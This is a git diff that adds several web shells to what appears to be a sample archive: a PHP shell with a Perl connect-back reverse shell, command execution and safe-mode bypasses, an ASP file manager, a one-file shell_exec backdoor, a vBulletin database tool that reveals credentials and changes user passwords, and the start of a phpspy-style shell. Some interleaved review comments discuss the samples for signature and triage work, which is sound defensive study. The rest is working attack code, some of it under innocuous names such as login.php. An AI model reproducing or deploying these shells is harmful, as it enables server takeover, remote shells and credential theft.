        "; +if (is_writable($_REQUEST['edit'])){ +print "
        ".$ef;}else {print "
        [ Can't edit +".basename($_REQUEST['edit'])." ]

        ";}}function svetxt(){ +$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){ +$nedittxt=stripslashes($_REQUEST['edittxt']); +fwrite ($fp,$nedittxt);print "
        [ ".basename($_REQUEST['edit'])." Saved !! ]
        ";fclose($fp);}else {print "
        [ Can't save the file !! ]
        ";}} +if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval'])) +{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt'])) +{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){ +$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); +$fileowner=$fileownerarray['name']; $fileg=filegroup($file); +$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name']; +print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){ +if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}} +elseif(isset($_REQUEST['mve'])){ +if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);} +}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";} +if (isset ($_REQUEST['safefile'])){ +$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){ +if(empty($_GET['file'])){if(empty($_POST['file'])){ +print "
        [ Please choose a file first to read it using copy() ]
        "; +} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}} +$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){ +$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo);echo "
        ".$sta.htmlspecialchars($tekst).$eta."
        ";unlink($temp);} else { +print "
        Sorry, Can't read the selected file !! +

        ";}}if (isset ($_REQUEST['inifile'])){ +ini_restore("safe_mode");ini_restore("open_basedir"); +print "
        ".$sta;
        +if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."
        ";} +if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);} +function callback($nscdir,$bip,$bport){ +if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";} +if (is_writable($nscdir)){ +$fp=fopen ("back.pl","w");$backpl='back.pl';} +else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';} +fwrite ($fp,"use Socket; +\$system='$epath'; +\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\"; +echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo; +echo \"[ User perms ][$]\";echo \"`id`\";echo; +echo \"[ Start shell ][$]\";'; + +if (!\$ARGV[0]) { + exit(1); +} +\$host = \$ARGV[0]; +\$port = 80; +if (\$ARGV[1]) { + \$port = \$ARGV[1]; +} +\$proto = getprotobyname('tcp') || die('Unknown Protocol\n'); +socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n'); +my \$target = inet_aton(\$host); +if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) { + die('Unable to Connect\n'); +} +if (!fork( )) { + open(STDIN,'>&SERVER'); + open(STDOUT,'>&SERVER'); + open(STDERR,'>&SERVER'); +print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]'; +print '\n[ A-S-T team ][ Lezr.com ]\n\n'; + system(\$sys);system (\$system); + exit(0); } + ");callfuncs("chmod 777 $backpl"); +ob_start(); +callfuncs("perl $backpl $bip $bport"); +ob_clean(); +print "
        [ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]
        +[ Check your connection now, if failed try changing the port number ]
        +[ Or Go to a writable dir and then try to connect again ]
        +[ Return to the Current dir ] [ Curr-Dir ] +

        ";}if (isset($_REQUEST['uback'])){ +$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; +if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");} +elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");} +elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}} +delm("# Komut ÇAlistir #");print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +print ""; +delm("");print "
        "; +print $st.$c1."
        ".$mess3.$ec; +print $c2.$sf."
        ";input("text","cfile","",53); +input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","crefile","Olustur",""); +print " ";input("submit","delfile","Sil",""); +print "
        ".$ef.$ec.$et."
        ".$st.$c1; +print "
        Enter the command to execute";print $ec; +print $c2.$sf."
        "; +input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"
        "; +input("submit","","Execute","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        $mess".$ec.$c2.$sf."
        "; +input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","credir","Create-D","");print " "; +input("submit","deldir","Delete-D",""); +print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dosya Düzenle/Oku".$ec;print $c2.$sf."
        "; +input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "
        "; +input("submit","","Oku-Düzenle","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dizin'i Göster
        ";print $ec.$c2.$sf."
        "; input("text","scdir",$nscdir,59);print"
        "; +input("submit","","Göster","");print " "; +input("reset","","R00T","");print "
        ".$ef.$ec.$et."
        ";print $st.$c1; +print "
        Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."
        "; +input("file","upfile","",40);input("hidden","scdir",$nscdir,0); +input("hidden","up",$nscdir,0); +print"
        ";input("submit","","Upload","");print "
        ".$ef.$ec.$et."
        ";print "
        "; +print $st.$c1."
        Execute php code with eval()
        "; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print " 
        "; +input('submit','evsub','Execute');print " "; +input('Reset','','Reset');print " "; +print "
        ".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Execute useful commands
        "; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print "
        ";print"
        "; +print $ec.$ef.$et."
        ";delm(""); +print ""; +print "
        "; +print $st.$c1."
        ".$cpmvmess."
        "; +print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); +print " To "; +input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; +input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); +print "".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Cok kullanilan Komutlar
        "; +print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); +print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; +print "
        ";delm(": Safe mode bypass :"); +print ""; +print "
        "; +print $st.$c1."
        Using copy() function
        "; +print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Using ini_restore() function
        "; +print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
        ";delm("# Backdoor Baglantisi #"); +print ""; +print "
        "; +print $st.$c1."
        Backdoor ile Baglan
        "; +print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; +input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Connect","");print " ";input("reset","","Reset",""); +print "".$ec.$ef.$et;print "
        ";print $st.$c1."
        Yüklenmis Backdoor
        "; +print $ec.$c2.$sf." ";print "";print " "; +input("text","uback","back.pl",23);print " "; +input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); +print "".$ec.$ef.$et;print "
        "; +print "
        "; print"
        "; +print"
        Copyright is reserved to Ekin0x
        [ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; +print"
        +
        "; +?> \ No newline at end of file diff --git a/php/kacak.php b/php/kacak.php new file mode 100644 index 0000000..91ab2b3 --- /dev/null +++ b/php/kacak.php @@ -0,0 +1,903 @@ + +

        www.kacaq.blogspot.com

        || By Kacak ||

        BuqX@HotMail.Com

        + + + + + +Kacak FSO 1.0 / GrayHatz Hacking Team - Terrorist Crew - TurkGuvenligi Priv8 Team / GrayHatz.Org ~ TurkGuvenligi.Ýnfo + + + + + + +<% +if request.querystring("TGH") = "1" then +on error resume next +es=request.querystring("Kacak") +diez=server.urlencode(left(es,(instrRev(es,"\"))-1)) + +Select case es +case "C:" diez="C:" +case "D:" diez="D:" +end select + + + + +%> + + + + + + + +<% +else +%> + + + +<% +if request.querystring("Dosyakaydet") <> "" then +set kaydospos=createobject("scripting.filesystemobject") +set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi")) +set kaydoses=nothing +set kaydospos=nothing +set kaydospos=createobject("scripting.filesystemobject") +set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true) +kaydoses.write request("duzenx") +set kaydoses=nothing +set kaydospos=nothing +end if +%> + + + + + +<% +if request.querystring("yenidosya") <> "" then +%> + + + + + + + + + + +
        +

        +

        + + + +
        + TC & GH & TC TEAM ©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@GrayHatz ~ TurkGuvenligi.Ýnfo 

        + + + + + +
        +  Çalýþýlan Klasör + + + + + + +
         <%=response.write(request.querystring("yenidosya"))%> +  
        +
        +
        + + + + + + + + + + + + + +
         
        + &klas=<%=request.querystring("yenidosya")%>" name="kaypos"> +

        +
        +Dosya Adý :
        +
        +
        +
        +
        +
        + +Ýçerik : 
        +
        + +
        +
        +
        + +

        + + + + +
        +

        +  

        + +
        +

        +  

        + + + +<% +else +%> + + + + + + + +<% +if request.querystring("klasorac") <> "" then + +set doses=createobject("scripting.filesystemobject") +set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx")) +set es=nothing +set doses=nothing + + +end if +%> + +<% +if request.querystring("klasac") <> "" then + +set aktifklas=request.querystring("aktifklas") + + +%> + + + + + + + + +
        +

        +

        + + +
        +
        TC & GH & TC TEAM ©
        + Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + + + +
        +  Çalýþýlan Alan + + + + + + +
         <%=aktifklas%> +  
        +
        + + + + + + + + + + + + + + + + + + + +<% +else +%> + + + +<% +if request.querystring("suruculer") <> "" then +%> + +
         
        +
        +

        +   +
        +
        +
        +
        + +

         
        + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM ©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + +
        +  
        +
        + + + + + + + + + + + + +
         
         
        +
        + + + + + + + + +
        + Sürücü Adý + Boyutu + Boþ Alan + Durum + Ýþlem
        +
        +
        +
        +
        + + + <% + set klassis =server.createobject("scripting.filesystemobject") + set klasdri=klassis.drives + %> + + <% + for each dongu in klasdri + %> + + <% + if dongu.driveletter <> "A" then + if dongu.isready=true then + %> + + <% + select case dongu.drivetype + case 0 teype="Diðer" + case 1 teype="Taþýnýr" + case 2 teype="HDD" + case 3 teype="NetWork" + case 4 teype="CD-Rom" + case 5 teype="FlashMem" + end select + %> + + + + + + + + +
        +  <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> ) + <%=Round(dongu.totalsize/(1024*1024),1)%> MB + <%=Round(dongu.availablespace/(1024*1024),1)%> MB + <%=teype%>  + + + + +
        + + Gir
        +
        + + <% + end if + end if + %> +<% +next +%> + + + +
        +
        +
        +
        + + + + +
        +  
        +
        +
        +

         

        +
         
        + + + + + +<% +else +%> + + + + + +<% +if request.querystring("kaydet") <> "" then +set dossisx=server.createobject("scripting.filesystemobject") +set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true) +dosx.write request("duzenx") +dosx.close +set dosyax=nothing +set dossisx=nothing + +end if +%> + + + + +<% +if request.querystring("duzenle") <> "" then +set dossis=server.createobject("scripting.filesystemobject") +set dos=dossis.opentextfile(request.querystring("duzenle"), 1) +sedx = dos.readall +dos.close +set dosya=nothing +set dossis=nothing + +set aktifklas=request.querystring("klas") +%> + + + + + + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + +
        +  Çalýþýlan Dosya + + + + + + +
         <%=response.write(request.querystring("duzenle"))%> +  
        +
        +
        + + + + + + + + + + + + + +
         
        + &klas=<%=aktifklas%>" name="kaypos"> +

        +

        + + + + +
        +

        + +

        + +
        +

        +  

        + + + +<% +else +%> + + +<% + +if request.querystring("klas") <> "" then +aktifklas=Request.querystring("klas") +if request.querystring("usak") = "1" then +aktifklas=aktifklas & "\" +end if + +else +aktifklas=server.mappath("/") +aktifklas=aktifklas & "\" +end if + +if request.querystring("silklas") <> "" then +set sis=createobject("scripting.filesystemobject") +silincekklas=request.querystring("silklas") +sis.deletefolder(silincekklas) +set sis=nothing +'response.write(sil & " Silindi") +end if + +if request.querystring("sildos") <> "" then +silincekdos=request.querystring("sildos") +set dosx=createobject("scripting.filesystemobject") +set dos=dosx.getfile(silincekdos) +dos.delete +set dos=nothing +set dosyasis=nothing +end if + + + + +select case aktifklas +case "C:" aktifklas="C:\" +case "D:" aktifklas="D:\" +case "E:" aktifklas="E:\" +case "F:" aktifklas="F:\" +case "G:" aktifklas="G:\" +case "H:" aktifklas="H:\" +case "I:" aktifklas="I:\" +case "J:" aktifklas="J:\" +case "K:" aktifklas="K:\" +end select + + + +if aktifklas=("C:") then aktifklas=("C:\") + +Set FS = CreateObject("Scripting.FileSystemObject") +Set klasor = FS.GetFolder(aktifklas) +Set altklasorler = klasor.SubFolders +Set dosyalar = klasor.files +%> + + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM ©

        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + +
        +  Çalýþýlan Klasör + + + + + + +
         <%=response.write(aktifklas)%> + + + + + +
        +

        + + " style="text-decoration: none"> + Üst Klasör

        +
        +
        +
        + + + + + + + + + + +
         
        + + + + + + +
        + + + + +
        + + + + Sürücüler
        +
        + + + + +
        + + + Yeni Klasör
        +
        + + + + +
        + + Yeni Dosya
        +
        +
        + + + + + + + + + + +
        +  Tür +  Dosya + Adý +

        +  Ýþlem

        + + + +<% For each oge in altklasorler %> + + + + + + + + + +
        +

        +

        +  <%=oge.name%>  + + + + +
        + +

        + +

        +
        + + + + +
        + +

        + + Sil + +

        +
        + +<% Next %> + + +<% For each oge in dosyalar %> + + + + + + + + + +
        +

        +

        +  <%=oge.name%> +         ( <%=Round(oge.size/1024,1)%> KB )  + + + + +
        + +

        + + Düzenle

        +
        + + + + +
        + +

        + + Sil

        +
        + +<% Next %> + + + +<% +if aktifklas=("C:\") then aktifklas=("C:") +%> + + +<% +end if +%> + + + +<% +end if +%> + + +<% +end if +%> + + +<% +end if +%> + +<% +end if +%> + + + + + + + +
         
        + + diff --git a/php/links.php b/php/links.php new file mode 100644 index 0000000..d35d8ef --- /dev/null +++ b/php/links.php @@ -0,0 +1,78 @@ +r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - +c99 - shell archive - php shells - php exploits - bypass shell - safe mode +bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - +r57.in + + + + + + + +
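Review bot: The content added as php/kacak.php is classic ASP/VBScript, not PHP: every server-side block is delimited by `<% … %>` and calls `request.querystring(...)` and `createobject("scripting.filesystemobject")`. Under a `.php` name it will be missed by any scanner or signature test that selects rules by extension, and it misstates which server stack the sample affects. I would move it to an ASP directory with an `.asp` name. The file create, edit and delete handlers (`dosyakaydet`, `kaydet`, `silklas`, `sildos`) act on caller-supplied paths, and no authentication check is visible in the hunk. The commit description should record those parameter names, since they are what a defender would search web-server logs for.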
        +
        
        +
        
        +
        
        +    

        +ShellCodes and Exploits City

        + +

        [ Home ] | [ Shell ] | [ Video ] | [ Links ] + +

        + +

        +[ Sosyete | T0fan +[ Kernel@Sh | Milw0rm +Google Big Darkc0de ] BackTrack ] + + + + +www.r57.in +

        + +Send all submissions to Mail r57 or r57.in + + Copyright © 2oo8~2oo9 Localshell + +Sitemiz en iyi Firefox ile (1024 x 768 veya Üstü çözünürlükte) görünmektedir. + +
        +
diff --git a/php/liz0zim.php b/php/liz0zim.php
new file mode 100644
index 0000000..dcc8d31
--- /dev/null
+++ b/php/liz0zim.php
@@ -0,0 +1,34 @@
+Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit

        "; +print_r(' +
        +
        +Komut : +
        +
        +Hýzlý Menü :=) : + +
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]);
+$liz0zim=shell_exec($_POST[liz0]);
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "

        "; +echo "Kimim Ben :=):$uid
        "; +echo "Server:$server
        "; +echo "Komut Sonuçlarý:
        "; +echo $liz0; +echo $liz0zim; +echo "

        "; +?> \ No newline at end of file diff --git a/php/login.php b/php/login.php new file mode 100644 index 0000000..3585c62 --- /dev/null +++ b/php/login.php @@ -0,0 +1,583 @@ + +EgY SpIdEr + + + +
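Review bot: `$liz0=shell_exec($_POST[baba]);` and `$liz0zim=shell_exec($_POST[liz0]);` run on every request and no login gate is visible in the hunk, so this sample is live as soon as the repository is checked out under a web root. For a sample archive I would not store it as an executable `.php` file; keep it under a non-served extension or inside a password-protected archive. It should open with a comment such as `// MALWARE SAMPLE, do not deploy: unauthenticated command execution from POST fields "baba" and "liz0"`. The pairing of `ini_restore("safe_mode")` / `ini_restore("open_basedir")` with `shell_exec` on a request variable is the stable trait for signature authors. The bare-word array keys are part of the original and should stay as they are so that hashes and signatures still match.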
        + + + + + + + + + + + + + + +
        ::::Read Config Data::::' . $path . ''; ?>
        Host : ' . $config['MasterServer']['servername'] . ''; ?>
        User : ' . $config['MasterServer']['username'] . ''; ?>
        Pass : No Password'; +} else { +$result = '' . $passsql . ''; +} +echo $result; ?>
        Name : ' . $config['Database']['dbname'] . ''; ?>
        +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +User : ' . $vbuser . ' was deleted
        '; +} else { +echo 'User : ' . $vbuser . ' could not be deleted'; +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell" && isset($_POST['var'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$var = $_POST['var']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Done Exploit.


        Use this :
        index.php?" . $var . "=shell.txt";}else{ +echo "

        Error

        ";} +$result1=mysql_query($Wdt2); + if ($result1) { echo "

        Done Create File


        Use this :
        index.php?" . $var . "=shell.txt";} else{ echo "

        Error

        ";} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code" && isset($_POST['code'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$index = $_POST['code']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Index was Changed Succefully

        ";}else{ +echo "

        Failed to change index

        ";} +$result1=mysql_query($Wdt2); +if ($result1) {echo "

        Done Create File

        ";} else{ echo "

        Error

        ";} +} + +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc" && isset($_POST['link'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$vblink = $_POST['link']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +The E-MAIL of the user ' . $vbuser . ' was changed to ' . $vbmail . '
        Back to Shell
        '; +} else { +echo 'Failed to change E-MAIL'; +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset($_POST['vbuser']) && isset($_POST['vbpass'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$vbuser = $_POST['vbuser']; +$vbpass = $_POST['vbpass']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +The pass of the user ' . $vbuser . ' was changed to ' . $vbpass . '
        Back to Shell
        '; +} else { +echo 'Failed to change PassWord'; +} +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +
        + + + + +
        :::::Change User Password:::::
        User :
        Pass :
        +'; +?> +
        +
        +
        + + + + +
        :::::Change User E-MAIL:::::
        User :
        MAIL :
        +'; +?> +
        +
        +
        + + + +
        :::::Delete a user:::::
        User :
        +'; +?> +
        +
        +
        + + + +
        :::::Change Index by Inclusion(Not PL(Al-Massya)):::::
        Index Link :
        +'; +?> +
        +
        +
        + + + +
        :::::Change Index by Code(All Edition):::::
        Index Code :
        +'; +?> +
        +
        +
        + + + +
        :::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::
        Variable :
        +'; +?> +
        + +
        + + + + + +
        :::::DATABASE CONFIG:::::
        Host :
        User :
        Pass :
        Name :
        +
        + +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +IDUSERNAMEEMAIL'; +while ($row = mysql_fetch_array($re)) +{ +echo'' . $row['userid'] . '' . $row['username'] . '' . $row['email'] . ''; +} +echo''; +?> +
        + +
        + + + + + +
        :::::DATABASE CONFIG:::::
        Host :
        User :
        Pass :
        Name :
        +
        + +
        + + +
        :::::CONFIG PATH:::::
        PATH :
        + +?> + +
        Center ||| Left ||| right ||| Bold ||| UnderLine ||| Italic ||| NewLine ||| Colour ||| Marquee ||| Picture ||| Link
        +

        +
        + +
        Copy The Code after Finishing your index
        + +
        +
        Main ShellList UsersIndex MakerReadConfig
        +

        www.egyspider.com

        +
        + + + + + + +

        o---[ r57.biz | | egy_spider@hotmail.com |developer by egy spider (ahmed rageh) ]---o

        +
        +
        + + \ No newline at end of file diff --git a/php/sadrazam.php b/php/sadrazam.php new file mode 100644 index 0000000..4369d8b --- /dev/null +++ b/php/sadrazam.php 
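Review bot: The name login.php hides what this sample is: the visible code appears to be a vBulletin database tool whose "Read Config Data" table prints `$config['MasterServer']['username']`, the password and `$config['Database']['dbname']`, and whose other actions change a user's password or e-mail, delete a user and rewrite the index. A generic file name like this collides with legitimate application files in name-based triage, so I would rename the sample after its banner and add a header comment such as `// MALWARE SAMPLE: forum database manipulation tool; discloses configured database credentials`. Each handler passes `$_POST['host']`, `$_POST['user']` and `$_POST['pass']` to `mysql_connect()` and echoes them back unescaped, so responders who find this file on a host should treat the database credentials and the forum user table as compromised. The SQL statements themselves are not visible in this rendering of the hunk, so the query construction could not be reviewed.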
@@ -0,0 +1,1973 @@ + $_value) { + if ($_key{0} != '_') { + if (IS_GPC) { + $_value = s_array($_value); + } + $$_key = $_value; + } + } +} + +/*===================== ||-Є+ф+| =====================*/ +$admin = array(); +// -|+ё-ш-к|#-ы-щ+д, true +к-ш-к-щ+д, false +к+#+++ +ы.--|ц-б-ю+Є+|-з +$admin['check'] = 0; +// +ч| -ш-к|#-ы-щ+д,|ы-|+-||-+|#-ы +$admin['pass'] = 'angel'; + +//+ч- |+ cookie +ў+|+|+з+-|+-т-к|є, +Є||-+#++ |г, |ы-|+---|ц#ф-+, +ё+Є|ы#г|+-м+- +// cookie |#+| +$admin['cookiepre'] = ''; +// cookie +ў+|+Є +$admin['cookiedomain'] = ''; +// cookie +ў+|-++| +$admin['cookiepath'] = '/'; +// cookie +--з|+ +$admin['cookielife'] = 86400; +/*===================== +ф+|+с- =====================*/ + +if ($charset == 'utf8') { + header("content-Type: text/html; charset=utf-8"); +} elseif ($charset == 'big5') { + header("content-Type: text/html; charset=big5"); +} elseif ($charset == 'gbk') { + header("content-Type: text/html; charset=gbk"); +} elseif ($charset == 'latin1') { + header("content-Type: text/html; charset=iso-8859-2"); +} + +$self = $_SERVER['PHP_SELF'] ? 
$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; +$timestamp = time(); + +/*===================== +э+|-щ+д =====================*/ +if ($action == "logout") { + scookie('phpspypass', '', -86400 * 365); + p(''); + p('Success'); + exit; +} +if($admin['check']) { + if ($doing == 'login') { + if ($admin['pass'] == $password) { + scookie('phpspypass', $password); + p(''); + p('Success'); + exit; + } + } + if ($_COOKIE['phpspypass']) { + if ($_COOKIE['phpspypass'] != $admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== -щ+д+с- =====================*/ + +$errmsg = ''; + +// #щ+|PHPINFO +if ($action == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + } else { + $errmsg = 'phpinfo() function has non-permissible'; + } +} + +// --+++-+ +if ($doing == 'downfile' && $thefile) { + if (!@file_exists($thefile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $fileinfo = pathinfo($thefile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.filesize($thefile)); + @readfile($thefile); + exit; + } +} + +// +#++--++#++|- +|+т +if ($doing == 'backupmysql' && !$saveasfile) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + $table = array_flip($table); + $result = q("SHOW tables"); + if (!$result) p('

        '.mysql_error().'

